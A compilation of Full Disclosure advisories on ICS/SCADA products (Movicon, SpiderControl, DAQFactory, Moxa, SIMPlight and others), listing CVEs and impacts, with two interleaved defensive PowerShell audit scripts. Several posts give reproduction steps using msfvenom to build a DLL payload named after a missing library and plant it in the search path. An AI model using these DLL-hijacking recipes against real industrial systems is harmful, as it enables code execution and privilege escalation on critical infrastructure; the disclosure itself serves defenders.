[FD] [ICS] Progea Movicon SCADA/HMI Vulnerabilities

2017-10-31 Thread Karn Ganeshen
Vendor: Progea
Equipment: Movicon SCADA/HMI
Vulnerability: Uncontrolled Search Path Element, Unquoted Search Path or
Element

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-progea-movicon-scadahmi-vulnerabilities/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-290-01

CVE-ID
CVE-2017-14017
CVE-2017-14019


AFFECTED PRODUCTS

The following versions of Movicon HMI, an HMI software platform, are
affected:
Movicon Version 11.5.1181 and prior.


BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Food and
Agriculture, Transportation Systems, Water and Wastewater Systems
Countries/Areas Deployed: Europe, India, and United States
Company Headquarters Location: Italy



IMPACT

Successful exploitation of these vulnerabilities could allow privilege
escalation or arbitrary code execution.



VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may allow a remote attacker without privileges to execute arbitrary
code in the form of a malicious DLL file.

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Movicon SCADA/HMI. User interaction is required
to exploit this vulnerability in that the malicious dll file should be
saved in any of the DLL search paths.

The specific flaw exists within the handling of a specific named DLL file
used by Movicon SCADA/HMI. By placing the specific DLL file (listed below), an
attacker is able to force the process to load an arbitrary DLL. This allows
an attacker to execute arbitrary code in the context of the process.


DLL File Name (1)

api-ms-win-appmodel-runtime-l1-1-0.dll


Application Executables (that look for missing DLL)

Movicon.exe
MoviconRunTime.exe
MoviconService.exe
AlarmsImpExp.exe
ReportViewerNET.exe


Steps to reproduce


1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o api-ms-win-appmodel-runtime-l1-1-0.dll

2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\Program Files\Progea\Movicon11.5\

3. Run MoviconService.exe (or any of the above listed executables), and Exit


CVE-2017-14017 has been assigned to this vulnerability. A CVSS v3 base
score of 6.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).


UNQUOTED SEARCH PATH OR ELEMENT CWE-428
An unquoted search path or element vulnerability has been identified, which
may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate his or her privileges.

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user’s code would execute with
the elevated privileges of the application.

• MOVICON (MOVICON) runs as LocalSystem and has path: C:\Program
Files\Progea\Movicon11.5\MoviconService.exe:

CVE-2017-14019 has been assigned to this vulnerability. A CVSS v3 base
score of 6.5 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).


Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [ICS] SpiderControl SCADA Web Server Improper Privilege Management Vulnerability

2017-10-31 Thread Karn Ganeshen
Vendor: SpiderControl
Equipment: SCADA Web Server
Vulnerability: Improper Privilege Management

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-spidercontrol-scada-web-server-improper-privilege-management-vulnerability/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-250-01

CVE-ID
CVE-2017-12728


AFFECTED PRODUCTS


The following versions of SCADA Web Server, a software management platform,
are affected:
SCADA Web Server Version 2.02.0007 and prior.


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could allow authenticated
system users to escalate their privileges under certain conditions.


VULNERABILITY OVERVIEW


IMPROPER PRIVILEGE MANAGEMENT CWE-269

Authenticated, non-administrative local users are able to alter service
executables with escalated privileges which could allow an attacker to
execute arbitrary code under the context of the current system services.

CVE-2017-12728 has been assigned to this vulnerability. A CVSS v3 base
score of 5.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).



Vulnerability Details


1. Untrusted Users Can Modify Windows Service Executables
It is possible for non-administrative local users to replace some of the
Windows Service executables with malicious programs. This could be abused
to execute programs with the privileges of the Windows services concerned.

The programs below have FILE_WRITE, WRITE_DAC or WRITE_OWNER permission
granted to non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_WRITE_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_WRITE_DATA

2. Delete Permission Granted On Windows Service Executables
It is possible for non-administrative local users to delete some of the
Windows Service executables with malicious programs. This could lead to
disruption or denial of service.

The programs below have DELETE permission granted to non-administrative
users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: DELETE
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
DELETE

3. Append Permission Granted On Windows Service Executables
It is possible for non-administrative local users to append to some of the
Windows Service executables with malicious programs. This is unlikely to be
exploitable for .exe files, but it is bad security practice to allow more
access than necessary to low-privileged users.

The programs below have FILE_APPEND permission granted to
non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_APPEND_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_APPEND_DATA


Best Regards,
Karn Ganeshen

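A defender-side audit for the two service weaknesses reported in this post and the Movicon post above: a service executable whose ACL lets low-privileged users write to or delete it (CVE-2017-12728, CWE-269), and an unquoted service path containing spaces (CVE-2017-14019, CWE-428). This is an added PowerShell example, not code from the advisories or either vendor; the MOVICON service name and the file paths are taken from the posts, everything else is a generic check that assumes an elevated session.

```powershell
# Added example: audit local services for an unquoted binary path (CWE-428) and
# for service executables whose ACL lets low-privileged principals modify or
# delete them (CWE-269 / CWE-276). Run from an elevated PowerShell session.

# Principals that should never hold write-class rights on a service binary.
$LowPrivPrincipals = @(
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing, appending to, deleting or re-ACLing the binary.
# Get-Acl reports generic rights numerically, so GENERIC_ALL | GENERIC_WRITE
# (0x50000000) is checked separately.
$DangerousRights  = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership, FullControl'
$GenericWriteBits = 0x50000000

function Get-ServiceBinaryPath {
    # Extract the executable path from a service PathName, which may carry arguments.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted: the binary is everything up to the first ".exe".
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split ' ')[0]
}

function Test-UnquotedServicePath {
    # True when the path is unquoted and contains a space (the CWE-428 condition):
    # the service control manager then probes C:\Program.exe, C:\Program Files\Progea\Movicon11.5\... in turn.
    param([string]$PathName)
    if ($PathName.TrimStart().StartsWith('"')) { return $false }
    $bin = Get-ServiceBinaryPath $PathName
    return ($null -ne $bin -and $bin.Contains(' '))
}

function Get-WeakBinaryAces {
    # Allow ACEs on the binary that give a low-privileged principal a dangerous right.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        ((([int]$_.FileSystemRights) -band [int]$DangerousRights) -ne 0 -or
         (([int]$_.FileSystemRights) -band $GenericWriteBits) -ne 0)
    })
}

function Invoke-ServiceBinaryAudit {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin) { continue }
        if (Test-UnquotedServicePath $svc.PathName) {
            [pscustomobject]@{
                Service = $svc.Name; Account = $svc.StartName; Binary = $bin
                Issue   = 'Unquoted service path (CWE-428)'
                Detail  = $svc.PathName
            }
        }
        foreach ($ace in Get-WeakBinaryAces $bin) {
            [pscustomobject]@{
                Service = $svc.Name; Account = $svc.StartName; Binary = $bin
                Issue   = 'Low-privileged principal can modify service binary (CWE-269/CWE-276)'
                Detail  = "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
            }
        }
    }
}

function Repair-UnquotedServicePath {
    # Remediation for CWE-428: rewrite ImagePath so the executable part is quoted.
    # Arguments after the .exe are preserved; restart the service afterwards.
    param([Parameter(Mandatory)][string]$ServiceName)
    $key     = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $current = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath.Trim()
    if (-not (Test-UnquotedServicePath $current)) { return $current }
    $bin   = Get-ServiceBinaryPath $current
    $tail  = $current.Substring($bin.Length)
    $fixed = '"' + $bin + '"' + $tail
    Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
    return $fixed
}

Invoke-ServiceBinaryAudit | Format-Table -AutoSize -Wrap
# For the Movicon finding above the fix would be:  Repair-UnquotedServicePath -ServiceName MOVICON
```

For a writable service binary such as C:\WWW\ScadaWindowsService.exe the remediation is to remove the write, append, delete, WRITE_DAC and WRITE_OWNER ACEs for Everyone and Authenticated Users (icacls or Set-Acl) and to verify the file's hash against the vendor's copy before trusting it again.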


[FD] JanTek JTC-200 Vulnerabilities

2017-10-31 Thread Karn Ganeshen
Vendor: JanTek
Equipment: JTC-200
Vulnerabilities: Cross-site Request Forgery, Improper Authentication

Advisory URL:
https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02

CVE-ID
CVE-2016-5789
CVE-2016-5791

Detailed Proof of Concept:
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/


AFFECTED PRODUCTS


The following versions of JTC-200, a TCP/IP converter, are affected:
JTC-200 all versions.


BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Europe and Asia
Company Headquarters Location: Taiwan



IMPACT

Successful exploitation of these vulnerabilities allows for remote code
execution on the device with elevated privileges.


VULNERABILITY OVERVIEW


CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
An attacker could perform actions with the same permissions as a victim
user, provided the victim has an active session and is induced to trigger
the malicious request.

CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score
of 8.0 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

IMPROPER AUTHENTICATION CWE-287
The improper authentication could provide an undocumented BusyBox Linux shell
accessible over the Telnet service without any authentication.

CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score
of 9.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).


Technical Details

https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/

Best Regards,
Karn Ganeshen



[FD] [ICS] AzeoTech DAQFactory – Insecure Default Permissions and Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: AzeoTech
Equipment: DAQFactory
Vulnerability: Incorrect Default Permissions, Uncontrolled Search Path
Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-azeotech-daqfactory-insecure-default-permissions-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-01

CVE-IDs
CVE-2017-12699
CVE-2017-5147


AFFECTED PRODUCTS

The following versions are affected:

DAQFactory versions prior to 17.1


BACKGROUND

Critical Infrastructure Sectors: Critical manufacturing, Energy, and Water
Countries/Areas Deployed: United States and Europe
Company Headquarters Location: United States


IMPACT

Successful exploitation of these vulnerabilities could allow authenticated
local users to escalate their privileges and execute arbitrary code.



VULNERABILITY OVERVIEW


A)
INCORRECT DEFAULT PERMISSIONS CWE-276
Local, non-administrative users may be able to replace or modify original
application files with malicious ones.

CVE-2017-12699 has been assigned to this vulnerability. A CVSS v3 base
score of 7.1 has been calculated; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

EVERYONE has FULL permissions over all the install files (*exe, *dll),
therefore, it is possible for any local, non-admin user to replace/modify
original application files with malicious ones, and gain privileged access
once an administrative user runs the application. Other vectors are
possible as well.


B)
UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

CVE-2017-5147 has been assigned to this vulnerability. A CVSS v3 base score
of 4.2 has been calculated; the CVSS vector string is
(AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L).

By default, the application (vulnerable versions) is installed in
C:\DAQFactory\. All Authenticated users have RWX permissions on this
directory.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.


Missing Libraries:

pegrc32a.dll
labjackm.dll
iopc.dll


Application Executables (that look for missing DLL):

DAQFactory.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o pegrc32a.dll

2. Place this dll in install directory (or any directory defined in the
PATH environment variable)
C:\DAQFactory\

3. Run DAQFactory.exe -> calc.exe executes


Best Regards,
Karn Ganeshen

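A defender-side check for the precondition every uncontrolled search path (CWE-427) finding in this digest relies on: a directory on the DLL search path that a non-administrative user can write to (here C:\DAQFactory with RWX for Authenticated Users) and a file carrying the name of a library the application looks for but does not ship. This is an added PowerShell example, not code from the advisories or any vendor; the DLL/OCX names and install directories are taken from the posts, the rest is generic and assumes an elevated session.

```powershell
# Added example: audit the DLL search locations the CWE-427 findings depend on.
# Reports (1) PATH entries and install directories that a low-privileged
# principal can write to, and (2) files in those directories whose name matches
# a DLL the advisories list as "missing", i.e. a library that would be loaded
# in place of the absent one. Run from an elevated PowerShell session.

$LowPrivPrincipals = @('Everyone', 'NT AUTHORITY\Authenticated Users',
                       'BUILTIN\Users', 'NT AUTHORITY\INTERACTIVE')
# Write-class rights; Get-Acl reports generic rights numerically, so
# GENERIC_ALL | GENERIC_WRITE (0x50000000) is tested separately.
$WriteRights      = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership, FullControl'
$GenericWriteBits = 0x50000000

# DLL/OCX names reported as missing across the advisories in this digest.
$WatchedNames = @(
    'api-ms-win-appmodel-runtime-l1-1-0.dll', 'pegrc32a.dll', 'labjackm.dll',
    'iopc.dll', 'iopc2.dll', 'ftd2xx.dll', 'i2capi.dll', 'hhctrl.ocx'
) + (41..48 | ForEach-Object { "msjet$_.dll" }) + (41..49 | ForEach-Object { "msjter$_.dll" })

function Get-LowPrivWriter {
    # Returns the first low-privileged principal with write-class rights on $Dir, else $null.
    param([string]$Dir)
    try { $acl = Get-Acl -LiteralPath $Dir -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band [int]$WriteRights) -ne 0 -or ($rights -band $GenericWriteBits) -ne 0) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

function Invoke-DllSearchPathAudit {
    param([string[]]$InstallDir = @())
    $windir = $env:SystemRoot
    $dirs = @(($env:Path -split ';') + $InstallDir) |
        Where-Object { $_ -and $_.Trim() } |
        ForEach-Object { $d = $_.Trim(); if ($d.Length -gt 3) { $d.TrimEnd('\') } else { $d } } |
        Sort-Object -Unique
    foreach ($d in $dirs) {
        if (-not (Test-Path -LiteralPath $d -PathType Container)) { continue }
        $who = Get-LowPrivWriter $d
        if ($who) {
            [pscustomobject]@{ Directory = $d; Issue = 'Search path directory writable by low-privileged principal'; Detail = $who }
        }
        # Legitimate copies of some of these names (e.g. hhctrl.ocx) live under the
        # Windows directory; the same name anywhere else on the search path is suspect.
        if ($d -like "$windir*") { continue }
        foreach ($name in $WatchedNames) {
            $candidate = Join-Path $d $name
            if (Test-Path -LiteralPath $candidate -PathType Leaf) {
                $hash = (Get-FileHash -LiteralPath $candidate -Algorithm SHA256).Hash
                [pscustomobject]@{ Directory = $d; Issue = 'Watched library name present outside the Windows directory'; Detail = "$name SHA256=$hash" }
            }
        }
    }
}

# Install directories named in the advisories; adjust to the local deployment.
Invoke-DllSearchPathAudit -InstallDir 'C:\DAQFactory', 'C:\Program Files\Progea\Movicon11.5', 'C:\Pro-face\WinGP' |
    Format-Table -AutoSize -Wrap
```

Directories flagged in the first category are the ones to re-ACL (remove the write ACE for the principal shown), and a flagged library name should be compared against what the vendor actually ships before the host is considered clean.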

[FD] [ICS] Moxa SoftNVR-IA Live Viewer – Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: Moxa
Equipment: SoftNVR-IA Live Viewer
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-moxa-softnvr-ia-live-viewer-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-220-02


AFFECTED PRODUCTS

The following versions of SoftNVR-IA Live Viewer, a video surveillance
software designed for industrial automation systems, are affected:

SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions.


BACKGROUND

Critical Infrastructure Sector(s): Critical Manufacturing, Energy, and
Transportation Systems.
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Taiwan


IMPACT

Successful exploitation of this vulnerability may allow an attacker to
execute code from a malicious DLL on the affected system with the same
privileges as the user running the program.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.

CVE-2017-5170 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).


Missing Libraries

msjet48.dll
msjet47.dll
msjet46.dll
msjet45.dll
msjet44.dll
msjet43.dll
msjet42.dll
msjet41.dll
msjter49.dll
msjter48.dll
msjter47.dll
msjter46.dll
msjter45.dll
msjter44.dll
msjter43.dll
msjter42.dll
msjter41.dll


Application Executables (that look for missing DLL)

SoftNVRIA.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o msjter41.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run SoftNVRIA.exe, and Exit

Note: Few DLLs are loaded when the application starts, while few are loaded
when the application is exited. Thus, code execution can happen at the
start or at exit time of the application run.

Best Regards,
Karn Ganeshen


[FD] [ICS] Schneider Electric Trio TView – vulnerable JRE versions in use

2017-08-31 Thread Karn Ganeshen
Vendor: Schneider Electric
Equipment: Trio TView
Vulnerabilities: Multiple Vulnerabilities for Java Runtime Environment

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-schneider-electric-trio-tview-vulnerable-jre-versions-use/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02

Schneider Electric Advisory
http://www.schneider-electric.com/en/download/document/SEVD-2017-199-01/

Fixed in TView Version 3.29.0.


AFFECTED PRODUCTS

The following versions of Schneider Electric Trio TView, a management and
diagnostics software, are affected:

Trio TView Software, TBUMPROG-TVIEW, Version 3.27.0 and prior.


BACKGROUND

Critical Infrastructure Sector: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Paris, France


IMPACT

Exploitation of these vulnerabilities may allow a remote attacker to
compromise the Trio TView Management Suite.


VULNERABILITY OVERVIEW


A Java Runtime Environment is provided with TView. The Java Runtime
Environment 1.6.0u27 is reported to have multiple vulnerabilities which may
impact TView Version 3.27.0 and earlier. The breakdown of the
vulnerabilities by CVSS score is as follows:

* 180 vulnerabilities were identified as having a CVSS base score of 7.0-10,
* 161 vulnerabilities were identified as having a CVSS base score of
4.0-6.9, and
* 24 vulnerabilities were identified as having a CVSS base score of 0.0-3.9.


Best Regards,
Karn Ganeshen



[FD] [ICS] SpiderControl SCADA MicroBrowser – Stack Buffer Overflow Vulnerability

2017-08-31 Thread Karn Ganeshen
Vendor: SpiderControl
Equipment: SCADA MicroBrowser
Vulnerability: Stack-based Buffer Overflow

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-spidercontrol-scada-microbrowser-stack-buffer-overflow/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-02

ZDI Advisory
http://www.zerodayinitiative.com/advisories/ZDI-17-694/

CVE-ID
CVE-2017-12707


AFFECTED PRODUCTS

The following versions of SCADA MicroBrowser, a software management
platform, are affected:

SCADA MicroBrowser Versions 1.6.30.144 and prior.


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could allow an attacker to
gain access to the system, manipulate system files, and potentially render
the system unavailable.


VULNERABILITY OVERVIEW


STACK-BASED BUFFER OVERFLOW CWE-121
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of SpiderControl SCADA MicroBrowser. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within processing of the StaticHTMLTagsFileName
tag. The issue results from the lack of proper validation of the length of
user-supplied data prior to copying it to a fixed-length stack-based
buffer. An attacker can leverage this vulnerability to execute arbitrary
code under the context of the current process.

CVE-2017-12707 has been assigned to this vulnerability. A CVSS v3 base
score of 7.3 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).



Best Regards,
Karn Ganeshen



[FD] [ICS] SpiderControl SCADA Web Server – Directory Traversal Vulnerability

2017-08-31 Thread Karn Ganeshen
Vendor: SpiderControl
Equipment: SCADA Web Server
Vulnerability: Directory Traversal

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-spidercontrol-scada-web-server-directory-traversal-vulnerability/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-03

ZDI Advisory
http://www.zerodayinitiative.com/advisories/ZDI-17-695

CVE-ID
CVE-2017-12694


AFFECTED PRODUCTS

The following versions of SpiderControl SCADA Web Server, a software
management platform, are affected:

SCADA Web Server < version 2.02.0100


BACKGROUND

Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland


IMPACT

Successful exploitation of this vulnerability could cause an attacker to
gain read access to system files through directory traversal.


VULNERABILITY OVERVIEW


IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (‘PATH
TRAVERSAL’) CWE-22

This vulnerability allows remote attackers to disclose sensitive
information on vulnerable installations of SpiderControl SCADA.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within web server access to the scdefault
directory. The issue results from the lack of proper validation of a
user-supplied path prior to using it in file operations. An attacker can
leverage this vulnerability to disclose files accessible to the SYSTEM
account.

CVE-2017-12694 has been assigned to this vulnerability. A CVSS v3 base
score of 5.3 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).



Best Regards,
Karn Ganeshen


[FD] [ICS] SIMPlight SCADA software – Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: SIMPlight
Equipment: SCADA Software
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-simplight-scada-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-01


AFFECTED PRODUCTS

The following versions of SIMPlight SCADA software, software for building
management systems and automated facilities, are affected:

SCADA Software version 4.3.0.27 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Chemical, Commercial Facilities,
Critical Manufacturing, Defense Industrial Base, Energy, Food and
Agriculture, Government Facilities, Healthcare and Public Health, Nuclear
Reactors, Materials, and Waste
Countries/Areas Deployed: Unknown
Company Headquarters Location: Russia


IMPACT

Successful exploitation of this vulnerability could allow an attacker to
execute arbitrary code.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may execute malicious DLL files that have been placed within the
search path.

By placing specific DLL file(s), an attacker is able to force the process
to load an arbitrary DLL. This allows an attacker to execute arbitrary code
in the context of the process when it is run.

CVE-2017-9661 has been assigned to this vulnerability. A CVSS v3 base score
of 7.0 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

iopc2.dll



Application Executables (that look for missing DLL)

ArchBrowser.exe
Designer.exe
Monitor.exe



Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o iopc2.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run ArchBrowser.exe (or any from listed above) -> calc.exe will execute


Best Regards,
Karn Ganeshen


[FD] [ICS] Solar Controls Heating Control Downloader – Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: Solar Controls
Equipment: Heating Control Downloader (HCDownloader)
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-solar-controls-heating-control-downloader-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-02


AFFECTED PRODUCTS

The following versions of Solar Controls’ Heating Control Downloader
(HCDownloader) are affected:

HCDownloader, Version 1.0.1.15 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Energy
Countries/Areas Deployed: Unknown
Company Headquarters Location: Czech Republic


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element has been identified, which could allow
an attacker to execute arbitrary code on a target system using a malicious
DLL file.

CVE-2017-9646 has been assigned to this vulnerability. A CVSS v3 base score
of 7.8 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

ftd2xx.dll


Application Executables (that look for missing DLL)

HCDownloader.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o ftd2xx.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run HCDownloader.exe -> calc.exe executes


Best Regards,
Karn Ganeshen


[FD] [ICS] Solar Controls WATTConfig M Software – Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: Solar Controls
Equipment: WATTConfig M Software
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-solar-controls-wattconfig-m-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03


AFFECTED PRODUCTS

The following versions of Solar Controls’ WATTConfig M Software for Windows
2.5.10 for M SSR/MAX PLCs are affected:

WATTConfig M Software, Version 2.5.10.1 and prior.


BACKGROUND

Critical Infrastructure Sector(s): Energy
Countries/Areas Deployed: Unknown
Company Headquarters Location: Czech Republic


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element has been identified, which could allow
an attacker to execute arbitrary code on a target system using a malicious
DLL file.

CVE-2017-9648 has been assigned to this vulnerability. A CVSS v3 base score
of 7.8 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).


Missing Libraries

ftd2xx.dll


Application Executables (that look for missing DLL)

WattConfigM.exe


Steps to reproduce

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o ftd2xx.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run WattConfigM.exe -> calc.exe executes


Best Regards,
Karn Ganeshen


[FD] [ICS] Schneider Electric Pro-Face WinGP – Insecure Library Loading Allows Code Execution

2017-08-31 Thread Karn Ganeshen
Vendor: Schneider Electric
Equipment: Pro-Face WinGP
Vulnerability: Uncontrolled Search Path Element (DLL side-loading)

Advisory URL:
https://ipositivesecurity.com/2017/06/28/ics-schneider-electric-pro-face-wingp-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-215-01


AFFECTED PRODUCTS

The following versions of Pro-face GP-Pro EX software, an HMI management
platform, are affected:

GP Pro EX version 4.07.000


BACKGROUND

Critical Infrastructure Sector: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Paris, France


IMPACT

Successful exploitation of this vulnerability may allow arbitrary code
execution.


VULNERABILITY OVERVIEW


UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An attacker is able to force the process to load an arbitrary DLL and
execute arbitrary code in the context of the process.

CVE-2017-9961 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
